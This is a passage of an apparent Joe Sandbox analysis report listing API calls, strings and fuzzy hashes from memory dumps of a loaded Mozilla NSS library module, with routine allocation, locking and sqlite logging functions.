                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C502E0B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1593528140-0
                                                                                                                                                                                                                          • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                          • Instruction ID: e17366f2c83853173c258f244718ddbd8b343a848a70142d6e375df3be6afcfe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4001A1F2A406009BEB309E26FC05BC7B7A5EB81318F040435E85EC6B20F632FC25C692
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C49AE42), ref: 6C4830AA
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4830C7
                                                                                                                                                                                                                            • Part of subcall function 6C483090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C4830E5
                                                                                                                                                                                                                            • Part of subcall function 6C483090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C483116
                                                                                                                                                                                                                            • Part of subcall function 6C483090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C48312B
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PK11_DestroyObject.NSS3(?,?), ref: 6C483154
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C48317E
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C4799FF,?,?,?,?,?,?,?,?,?,6C472D6B,?), ref: 6C49AE67
                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C4799FF,?,?,?,?,?,?,?,?,?,6C472D6B,?), ref: 6C49AE7E
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C472D6B,?,?,00000000), ref: 6C49AE89
                                                                                                                                                                                                                          • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C472D6B,?,?,00000000), ref: 6C49AE96
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C472D6B,?,?), ref: 6C49AEA3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
• String ID:
• API String ID: 754562246-0
• Opcode ID: e5cc729b04a7659f968be7c449c17ec258a42a5e58b5cdf48d52f7635dfc7a2d
• Instruction ID: 321ad2081eecc3de372e147ef36d63d32fa59c4435700b0cdd8de3b8b6f9dc93
• Opcode Fuzzy Hash: e5cc729b04a7659f968be7c449c17ec258a42a5e58b5cdf48d52f7635dfc7a2d
• Instruction Fuzzy Hash: 2E01A966F8503057EB01D16CAC85E9B3B988F9765DF090035E905D7B01FB15D90642E3
APIs
• DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BDC3
• free.MOZGLUE(?,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BDCA
• PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BDE9
• free.MOZGLUE(?,00000000,00000000,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BE21
• free.MOZGLUE(00000000,00000000,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BE32
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: free$CriticalDeleteDestroyMonitorSection
• String ID:
• API String ID: 3662805584-0
• Opcode ID: 341707c39abc3b3aa0be7433ac06a5d32ee60f5f23b627a20c59350e84509f3e
• Instruction ID: 4c18cc17c99d0bda061c3d777b40529af16c50dd3dd6502fa36b5dcbccf03829
• Opcode Fuzzy Hash: 341707c39abc3b3aa0be7433ac06a5d32ee60f5f23b627a20c59350e84509f3e
• Instruction Fuzzy Hash: 3E11E6B5B027109FDF00DF29CC49B063BB9AB4A254B4A0029D50AC7710E732B914CBAD
APIs
• PR_Free.NSS3(?), ref: 6C587C73
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C587C83
• malloc.MOZGLUE(00000001), ref: 6C587C8D
• strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C587C9F
• PR_GetCurrentThread.NSS3 ref: 6C587CAD
  • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CurrentFreeThreadValuemallocstrcpystrlen
• String ID:
• API String ID: 105370314-0
• Opcode ID: aa6d858522c73e0ee2d0b4b5f5ecfcdd687e1f868ac8b6e6eaf190db2a467bd6
• Instruction ID: 1a4683371a552569a3f9e6e6791d79433ae4bd27287c5d34b2825c5909e2e8b2
• Opcode Fuzzy Hash: aa6d858522c73e0ee2d0b4b5f5ecfcdd687e1f868ac8b6e6eaf190db2a467bd6
• Instruction Fuzzy Hash: DAF0F6F1A11626BFEB009F3A9C09947776CEF502A5B018435EC0DC7B00EB30E514CAE5
APIs
• DeleteCriticalSection.KERNEL32(6C58A6D8), ref: 6C58AE0D
• free.MOZGLUE(?), ref: 6C58AE14
• DeleteCriticalSection.KERNEL32(6C58A6D8), ref: 6C58AE36
• free.MOZGLUE(?), ref: 6C58AE3D
• free.MOZGLUE(00000000,00000000,?,?,6C58A6D8), ref: 6C58AE47
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: free$CriticalDeleteSection
• String ID:
• API String ID: 682657753-0
• Opcode ID: dadac7ed899ce4d47329d58581ce90f9b03f57ff5357f8ce2846c9be4c27f540
• Instruction ID: 63c11e11e136d8b2d8d2b051aedbe2f1fba97aadc62188d5494a53fb8bd7098f
• Opcode Fuzzy Hash: dadac7ed899ce4d47329d58581ce90f9b03f57ff5357f8ce2846c9be4c27f540
• Instruction Fuzzy Hash: BFF06275202E01A7CA10DFA99C0C95B7778FE86679715032CE52A87980E732F216C7D9
APIs
• PR_SetError.NSS3(FFFFE001,00000000,?,?), ref: 6C4F9AE4
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Error
• String ID: ($0@Zl$`@Zl
• API String ID: 2619118453-2516348057
• Opcode ID: 55a0d0094c98e3766b7fd2c89971627cfb9fce7cf0cd5a7b7a8b8b040e23e48d
• Instruction ID: 7e3f0779d9d531b9ac4ac340fe43c3ccb13eeac468ec88b32443db8ac58dc3e7
• Opcode Fuzzy Hash: 55a0d0094c98e3766b7fd2c89971627cfb9fce7cf0cd5a7b7a8b8b040e23e48d
• Instruction Fuzzy Hash: 1291E231E042599BDF10EF95C840FEDBBB1BFD8309F248129E8656BB51D3329986CB90
APIs
• sqlite3_mprintf.NSS3(6C5AAAF9,?), ref: 6C40BE37
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: sqlite3_mprintf
• String ID: Xl$PXl$winFileSize
• API String ID: 4246442610-4264483736
• Opcode ID: 0df894d65e209db408c3cabff87dfe561264e712704d576b5caf7f537dea1b31
                                                                                                                                                                                                                          • Instruction ID: c42ba40ecc704de23f8c8b1758f564eb428a3e2b006e247af17862188f5a966d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0df894d65e209db408c3cabff87dfe561264e712704d576b5caf7f537dea1b31
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5619D31B44605EFDB04CF28C890EA9B7B1FF8A314B0586B9D8158BB40D730E956CBD9

APIs
• sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C417D35
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: sqlite3_log
• String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
• API String ID: 632333372-598938438
• Opcode ID: fecea2fb170f99d796c5708334da1392fc63261259db67e9548aef7e977f3120
• Instruction ID: 814d588682882d07cfb636c79c5a3531f419145f5956a5750f2d5d1a0391170b
• Opcode Fuzzy Hash: fecea2fb170f99d796c5708334da1392fc63261259db67e9548aef7e977f3120
• Instruction Fuzzy Hash: 9A31F471E0C22997C710CF9EC880DBDBBF1AF44345B590196E484B7B85D271E842C7A4

APIs
• sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C406D36
Strings
• database corruption, xrefs: 6C406D2A
• 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C406D20
• %s at line %d of [%.10s], xrefs: 6C406D2F
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: sqlite3_log
• String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
• API String ID: 632333372-598938438
• Opcode ID: a57f99850d5ee161323fad6a601f788b87cc56d49023785b80d75a667b4620e6
• Instruction ID: 98b64c19365427c2bf04059f64183717dc07b67c87857371dd6b0e827477b3fe
• Opcode Fuzzy Hash: a57f99850d5ee161323fad6a601f788b87cc56d49023785b80d75a667b4620e6
• Instruction Fuzzy Hash: 9321DE707443059BD710CF1AD841F9AB7E2AF84308F148A2DDC5A9BB51E371E98ACB92

APIs
• PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+Nl,6C4E32C2,<+Nl,00000000,00000000,?), ref: 6C4E2FDA
  • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
  • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
  • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
• PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C4E300B
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
  • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
  • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
  • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
• SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C4E302A
  • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
  • Part of subcall function 6C4BC3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C4BC45D
  • Part of subcall function 6C4BC3D0: TlsGetValue.KERNEL32 ref: 6C4BC494
  • Part of subcall function 6C4BC3D0: EnterCriticalSection.KERNEL32(?), ref: 6C4BC4A9
  • Part of subcall function 6C4BC3D0: PR_Unlock.NSS3(?), ref: 6C4BC4F4
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
• String ID: <+Nl
• API String ID: 2538134263-2237628156
• Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
• Instruction ID: c287604cf340fe1ea6c0460f3ccbc1df82e26030b2e104b932eb8692938b116a
• Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
• Instruction Fuzzy Hash: 0311C4B6A001046BDB00DE64DC00F9B77AA9B85279F1A8138EC1CD7790E772E915C7E1

APIs
  • Part of subcall function 6C53CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C53CC7B), ref: 6C53CD7A
  • Part of subcall function 6C53CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C53CD8E
  • Part of subcall function 6C53CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C53CDA5
  • Part of subcall function 6C53CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C53CDB8
• PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C53CCB5
• memcpy.VCRUNTIME140(6C5D14F4,6C5D02AC,00000090), ref: 6C53CCD3
• memcpy.VCRUNTIME140(6C5D1588,6C5D02AC,00000090), ref: 6C53CD2B
  • Part of subcall function 6C459AC0: socket.WSOCK32(?,00000017,6C4599BE), ref: 6C459AE6
  • Part of subcall function 6C459AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C4599BE), ref: 6C459AFC
  • Part of subcall function 6C460590: closesocket.WSOCK32(6C459A8F,?,?,6C459A8F,00000000), ref: 6C460597
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                          • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                          • API String ID: 1231378898-412307543
                                                                                                                                                                                                                          • Opcode ID: ac2b3202054891969072743bb4959f1abcd13bab9cf48b95bd193201cc593f13
                                                                                                                                                                                                                          • Instruction ID: 8c8b29e72057abea4f5a9f5cdbc56e4fab84a335fadff71d1693fb485923b6ef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac2b3202054891969072743bb4959f1abcd13bab9cf48b95bd193201cc593f13
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD1160F5B223609EEB009F599C06B433AF89396628F161129E41ACBB42E775F4044FDE
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C490715), ref: 6C488859
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C488874
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C48888D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: calloc$ArenaInitLockPool
                                                                                                                                                                                                                          • String ID: NSS
                                                                                                                                                                                                                          • API String ID: 2230817933-3870390017
                                                                                                                                                                                                                          • Opcode ID: 4224ba73fd64e82cc36a6b0b616ff129ce42623541326b54f46f93a21e3f45af
                                                                                                                                                                                                                          • Instruction ID: 83ae5b79a9eeee0ba2137285c0c493b6a77a46551982ed91300c40fcd75f5841
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4224ba73fd64e82cc36a6b0b616ff129ce42623541326b54f46f93a21e3f45af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0F662E4362033F210A2696C06F8775989F9275EF040035E90CA3B82EB52E50883E3
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000116BB,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,6C52A4E2), ref: 6C53B8C6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • database corruption, xrefs: 6C53B8BA
                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C53B8B0
                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C53B8BF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 632333372-598938438
                                                                                                                                                                                                                          • Opcode ID: f7e665d45c6a4c34ff1ba07b0e9efe87daecec31c564059afcd5b94db99f4fe2
                                                                                                                                                                                                                          • Instruction ID: 0fc32b8c75f50bf91a1e4708d79bcce523934fbd6ac58943a71718733ed659d0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7e665d45c6a4c34ff1ba07b0e9efe87daecec31c564059afcd5b94db99f4fe2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F0149329481A0A9D310DB7A5C94D937FBC9F8531570B01C9FA446F3B3E212C802C3E1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4081DF
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C408239
